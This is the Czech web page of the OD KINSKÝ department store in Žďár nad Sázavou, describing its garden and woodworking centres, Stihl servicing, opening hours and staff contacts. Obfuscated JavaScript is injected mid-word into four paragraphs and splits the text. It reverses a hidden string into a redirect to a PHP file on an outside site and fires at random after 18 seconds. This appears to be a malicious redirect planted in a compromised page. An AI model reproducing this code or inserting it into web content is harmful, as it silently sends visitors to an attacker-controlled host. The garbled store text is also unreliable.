Žďár nad Sázavou, obchod, obchodní dům, Kinský Žďár, les, dům, zahrada
Rainbow page separator

OD KINSKÝ

https://kinsky-zdar.cz/obchodni-dum

Obchodní dům KINSKÝ

„Vše pro les, dům a zahradu“

Na více než 4000 m2 prodejní plochy najdete vše pro kutily, hospodyňky, zahradníky i stavitele.

Připravujeme pro Vás pravidelné akce, nabízíme celou řadu doplňkových služeb jako je například rozvoz zboží až do domu a další.
Jsme servisním střediskem značky Stihl, provádíme servis zahradních strojů a mo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torových pil, broušení řetězů.

V rámci OD KINSKÝ najdete specializované Zahradní centrum a také Dřevařském centrum.

Naše zahradní centrum má venkovní a vnitřní část. Vnitřní se nachází ve spodní hale obchodního domu a je otevřena celoročně. Najdete zde vše, co Vás napadne, když se řekne zahrada.

Venkovní část zahradního centra je otevřena obvykle od března do lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu. Na cca 1200 m2 prodejní plochy najdete sezónní nabídku rostlin, květin, dřevin, zahradních potřeb a doplňků do zahrady.

Veškeré rostliny v našem zahradním centru pochází výhradně od českých dodavatelů. Rostliny tak necestují s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovky kilometrů a jsou přizpůsobené místním klimatickým podmínkám. Kratší cesta ke spotřebiteli znamená pro rostlinu menší zátěž (nedostatek světla, teplota apod.), a zkrácená přeprava je cenná i z ekologického hlediska pro celou Evropu. V sortimentu najdete květiny pod ochrannou známkou Česká květina = záruka kvality, původu a dalšího rozvoje.

Dřevařské centrum nabízí vše potřebné pro práci se dřevem, ať už se týká pracovního nářadí či samotného prodeje a řezání plošného materiálu formá[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovací pilou nebo hranování DTD desek.

Obchodní dům i Zahradní centrum pravidelně doplňujeme sezónním zbožím: vánoční a velikonoční dekorace, květinovou výzdobu i dekorace k Památce zesnulých, letničky, trvalky, ovocné stromky a keře, prodej vánočních stromků, apod.

Kontaktní údaje:

OD KINSKÝ
Bezručova 39/4
591 01 Žďár nad Sázavou 1

 

Provozní doba:

  • po – pá 08.00 – 18.00
  • so 08.00 – 17.00
  • ne 09.00 – 17.00

 

Kontakty:

  • Vedoucí OD Jaroslav Žwak – 564 565 210, 739 139 829, j.zwak@kinsky-zdar.cz;
  • Informace – 566 628 861, 737 215 276, info@kinsky-zdar.cz
  • Dřevo, Zahrada – 564 565 214, 733 706 263, zahrada@kinsky-zdar.cz
  • Pokladna – 564 565 216, 564 565 217, obchod@kinsky-zdar.cz
  • Nářadí, STIHL – 564 565 211, 731 156 462, naradi@kinsky-zdar.cz

Email: obchod@kinsky-zdar.cz

Webhttps://kinsky-zdar.cz/obchodni-dum

 

Těšíme se na Vaši návštěvu!